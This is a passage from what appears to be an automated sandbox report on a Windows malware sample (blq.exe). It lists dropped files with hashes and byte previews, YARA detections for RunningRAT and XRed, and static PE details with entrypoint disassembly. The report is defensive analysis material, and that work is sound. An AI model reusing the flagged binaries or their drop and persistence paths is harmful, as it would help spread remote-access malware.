                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lmIeXSMMx588Dqh-qA0TNQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\e8ZCpA3.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.264657516958929
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0o86eSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+lY+pAZewRDK4mW
                                                                                        MD5:1E01084386A373D73D0BA0090CF11BD5
                                                                                        SHA1:0D601F3852EDC587C5589088195887DBCAD4E390
                                                                                        SHA-256:339A167FEB3940A676ED342DF622216CFCAA4183B0CDE7DE36187EB0A1EDDF25
                                                                                        SHA-512:E4D4C2AEB0A17998E79A1B13526A08A03EB6596CEF0FC5EB9B1D0440202B0DBD44B18CE9B136E878BB7396F73C0F682DE60E51316F1523D219AE5519E81A25F2
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_PBz18ArdGkoI16LWz_8uw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\l6DX2RD.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.274499989347445
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0YlSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t+pAZewRDK4mW
                                                                                        MD5:278F1E4907F8DBF1A87B81A1A2B144D6
                                                                                        SHA1:70E319180963700C9F97DBDD3E5E1633674917D5
                                                                                        SHA-256:EAFB9806C4BF495E52711AFFFE5130E7EA0474E669E9EDE6C1E23F289F0188EF
                                                                                        SHA-512:260A74963CD433837B04F0C39E376D764B1D430A8180B9DC4D867553409DD648A2F7DE13DD0AD4BD154EE6E40FB13683922BDFC7AAD57B645647ACC7AAE90C4C
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1XF0OOGOUTTqhRHKHTxZFw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\p7nf6x2.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.277329223139874
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0QkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+w+pAZewRDK4mW
                                                                                        MD5:BCD93269CB043B13769AEABB8973A221
                                                                                        SHA1:D2F891A31338E52461D7E39DE06EAC6BEE86FE54
                                                                                        SHA-256:99B8E77560806535023B626FC4161E7AAB70AB0B784179E3FB5FAE0CC9195C65
                                                                                        SHA-512:E93DC472688B3F12C7299E03D877937C39A8EE4308A39E018B24DA1BAF3C68618D0E140B7FE702C64437F939334924DA3CCDAB8278AB39FDF4D6C11E6A4404F0
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="36qRU-hWGFqjj6e9bVZiYA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\pVcqaDC.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.267469673831808
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+05tmSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+V+pAZewRDK4mW
                                                                                        MD5:6252DF6F2638FE8FC40592CDE3F36286
                                                                                        SHA1:A2CDFE5A85B5CE3804D1B88E1C84E802E0055EDA
                                                                                        SHA-256:E93C088C0A2F5092E96738711F79F86DB2D2828A4897AE7B209AD8FA6ED50C9C
                                                                                        SHA-512:55443F798B72458CC7185FAE347929B519496078C9E61AF5F93FEF87E44E55366861DF4C40AA3ED20A0F376E1017207A9D1B60F2725D827455C838C4661ED1EC
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="bvlLRLXCxLQGoU2B4Mbi9A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\w5NXXeL.ini

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.2519670130759755
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+03DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8D+pAZewRDK4mW
                                                                                        MD5:DB29CFD50DC6F393EC99816EFD33CF3F
                                                                                        SHA1:86C9B8D7FF6817231A60A94B4F2D94B9BEC7816F
                                                                                        SHA-256:E3F60F1D57801718E241E1118A92DC18CA4C6120BF9DCB9D1D81C49C28D65639
                                                                                        SHA-512:ED7BE4D89FD6699309C7EB72A9AE01D516B829BBB290BE420EAD09292CB50788CC07F338A0DDCB993E99B6590FF275FF91844A8C2DED0EF18A3C0FDBAC63B2EE
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="k8p0gpslK7k-K8qXqL4f7w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                        C:\Users\user\AppData\Local\Temp\~$OslfsL4J.xlsm

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):165
                                                                                        Entropy (8bit):1.4377382811115937
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                        MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                        SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                        SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                        SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                        Malicious:false
                                                                                        Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                        C:\Users\user\AppData\Local\Temp\~DF601ED631F8CE1B03.TMP

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):3.746897789531007
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                        MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                        SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                        SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                        SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                        Malicious:false
                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\._cache_blq.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\blq.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):5.2490926306073815
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:zynb12Aw5J6HC4kq5Jp9bjAzhyY55J+NStcEeUlyqgZl4p67ohPC:Ub1MsHz3JDwhyWr+N95OTga6L
                                                                                        MD5:2C8E6B45F0113B45F9187B60DF114FEF
                                                                                        SHA1:7E7B6F59FCED74C16BEF14F03F19EEECB5D34103
                                                                                        SHA-256:476328C1BA85A1DF9B0E678B9219DD1D5E529596303896049797683F20AD23E2
                                                                                        SHA-512:3A415E14CE61E0DFBDD1064F39B129F11EE1419442C49209E62C90D54D57B4A9EF8544F2108BF562EC9D8C9DD3DAA3221A4B670918BA48AF68CA439921301337
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_RunningRAT, Description: Yara detected RunningRAT, Source: C:\Users\user\Desktop\._cache_blq.exe, Author: Joe Security
                                                                                        • Rule: GoldDragon_RunningRAT, Description: Detects Running RAT from Gold Dragon report, Source: C:\Users\user\Desktop\._cache_blq.exe, Author: Florian Roth
                                                                                        • Rule: MALWARE_Win_RunningRAT, Description: Detects RunningRAT, Source: C:\Users\user\Desktop\._cache_blq.exe, Author: ditekSHen
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..tW..tW..tW.h[..tW..{...tW.DhY..tW.k]..tW.kS..tW..RS..tW..tV.[tW..R\..tW..rQ..tW.Rich.tW.........PE..L....w.T................. ...........(.......0....@.............................................................................d....................................................................................0...............................text............ .................. ..`.data....x...0.......0..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\Documents\DTBZGIOOSO\XZXHAVGRAG.xlsm

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:Microsoft Excel 2007+
                                                                                        Category:dropped
                                                                                        Size (bytes):18387
                                                                                        Entropy (8bit):7.523057953697544
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                        MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                        SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                        SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                        SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                        Malicious:false
                                                                                        Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                        C:\Users\user\Documents\DTBZGIOOSO\~$XZXHAVGRAG.xlsx

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):165
                                                                                        Entropy (8bit):1.4377382811115937
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                        MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                        SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                        SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                        SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                        Malicious:false
                                                                                        Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                        C:\Users\user\Documents\DTBZGIOOSO\~$cache1

                                                                                        Download File
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):771584
                                                                                        Entropy (8bit):6.622826360248542
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I5r:ansJ39LyjbJkQFMhmC+6GD9G
                                                                                        MD5:64C0A5B375F1AB0C44808320D5AF9E84
                                                                                        SHA1:F24C7694E6CF1763C1A98BD1A27152BED1EBFF82
                                                                                        SHA-256:05B222D35057310611697B4D0EE99656F9956BD421785AEDFA3B928000F07801
                                                                                        SHA-512:2353837EB7A446CEF1863C1488204619716F4BEB14371FBC9F1D6A07D3336452F7DA8E6A078C4335EA2086494F292908C7DCA5C8A7F1A371CD9DC14F997EC217
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):55
                                                                                        Entropy (8bit):4.306461250274409
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                        Malicious:false
                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                        C:\Windows\SysWOW64\encvbk.exe

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\svchost.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):61440
                                                                                        Entropy (8bit):6.199746098562656
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:H9ykYCTdiHQKrFXmw2RQln5IUmDjoX6+:HlMHprF2nRQln5I
                                                                                        MD5:889B99C52A60DD49227C5E485A016679
                                                                                        SHA1:8FA889E456AA646A4D0A4349977430CE5FA5E2D7
                                                                                        SHA-256:6CBE0E1F046B13B29BFA26F8B368281D2DDA7EB9B718651D5856F22CC3E02910
                                                                                        SHA-512:08933106EAF338DD119C45CBF1F83E723AFF77CC0F8D3FC84E36253B1EB31557A54211D1D5D1CB58958188E32064D451F6C66A24B3963CCCD3DE07299AB90641
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: nsdksetup.dll, Detection: malicious, Browse
                                                                                        • Filename: #U63d0#U53d6Proxy.exe, Detection: malicious, Browse
                                                                                        • Filename: #U4ee3#U7406.exe, Detection: malicious, Browse
                                                                                        • Filename: #U63d0#U53d6Proxy (1).exe, Detection: malicious, Browse
                                                                                        • Filename: V6bBcEdp5a.dll, Detection: malicious, Browse
                                                                                        • Filename: l10U7QN0CY.dll, Detection: malicious, Browse
                                                                                        • Filename: KlzXRW4Ag7.dll, Detection: malicious, Browse
                                                                                        • Filename: ZfJheGhddq.dll, Detection: malicious, Browse
                                                                                        • Filename: PD5dVJNpz7.dll, Detection: malicious, Browse
                                                                                        • Filename: 7YtmCkMUx3.dll, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.....^...^...^.pb^...^.c._...^.c._...^...^c..^.c._...^.c._...^.c._...^.c.^...^.c._...^Rich...^........PE..L...9..j.................b...........a............@..........................@............@.............................................hg...................0..........T........................... ........................m..`....................text...La.......b.................. ..`.data................f..............@....idata...............h..............@..@.didat...............~..............@....rsrc...hg.......h..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................

                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1835008
                                                                                        Entropy (8bit):4.465645968958063
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:cIXfpi67eLPU9skLmb0b4jWSPKaJG8nAgejZMMhA2gX4WABl0uN9dwBCswSb8:hXD94jWlLZMM6YFHf+8
                                                                                        MD5:F44638F3AF9A81AACDE5B022701CDB2C
                                                                                        SHA1:BFF87D180E690FA03729A97A36FB4CBBC12AE614
                                                                                        SHA-256:57474F88AB4D4933DB600C57736FFB713E4ADB1F8EA1E86B8B714A7C902A23A9
                                                                                        SHA-512:5C65FA451646FEA6518021344F7F609F6579CCB366045A3409351A7C9C88520D9836190E728F30C5A234B9FD04927A82EF612DFF983762AA25BFDA487F4AACD4
                                                                                        Malicious:false
                                                                                        Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZ..HV...............................................................................................................................................................................................................................................................................................................................................d.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):6.5618190433891295
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 93.58%
                                                                                        • Win32 Executable Borland Delphi 7 (665061/41) 6.22%
                                                                                        • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        File name:blq.exe
                                                                                        File size:820'736 bytes
                                                                                        MD5:6153a06b74491bacb664bf142b598c69
                                                                                        SHA1:dade36a11a568e3b0b5f3e7fd44b566182702534
                                                                                        SHA256:0b510380e52b3c97e7a2f227eb9ecda6a194885da74fac6630f1eb7d5ee6091f
                                                                                        SHA512:bb1c20ce4b2ae5e3524e1127eca6047ab897da49d8b66e435e8d81f418dc16c7c6345887ae67c9ca7ea0f39d175eedace8dabc74be9db9ea492ca4c489ec4721
                                                                                        SSDEEP:12288:GMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9zl6MMuj:GnsJ39LyjbJkQFMhmC+6GD99h
                                                                                        TLSH:31058E22F2D18437D1321A3D9C6BA3A5582ABE512E38794F7BF42E4D5F3D68138252D3
                                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                        File Icon

                                                                                        Icon Hash:71b018dccec77331

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x49ab80
                                                                                        Entrypoint Section:CODE
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                        DLL Characteristics:
                                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:332f7ce65ead0adfb3d35147033aabe9

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        add esp, FFFFFFF0h
                                                                                        mov eax, 0049A778h
                                                                                        call 00007F37F0D47F6Dh
                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                        mov eax, dword ptr [eax]
                                                                                        call 00007F37F0D9B8B5h
                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                        mov eax, dword ptr [eax]
                                                                                        mov edx, 0049ABE0h
                                                                                        call 00007F37F0D9B4B4h
                                                                                        mov ecx, dword ptr [0049DBDCh]
                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                        mov eax, dword ptr [eax]
                                                                                        mov edx, dword ptr [00496590h]
                                                                                        call 00007F37F0D9B8A4h
                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                        mov eax, dword ptr [eax]
                                                                                        call 00007F37F0D9B918h
                                                                                        call 00007F37F0D45A4Bh
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x1dd30.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        CODE0x10000x99bec0x99c0033fbe30e8a64654287edd1bf05ae7c8cFalse0.5141641260162602data6.572957870355296IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        DATA0x9b0000x2e540x30001f5e19e7d20c1d128443d738ac7bc610False0.453125data4.854620797809023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        BSS0x9e0000x11e50x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
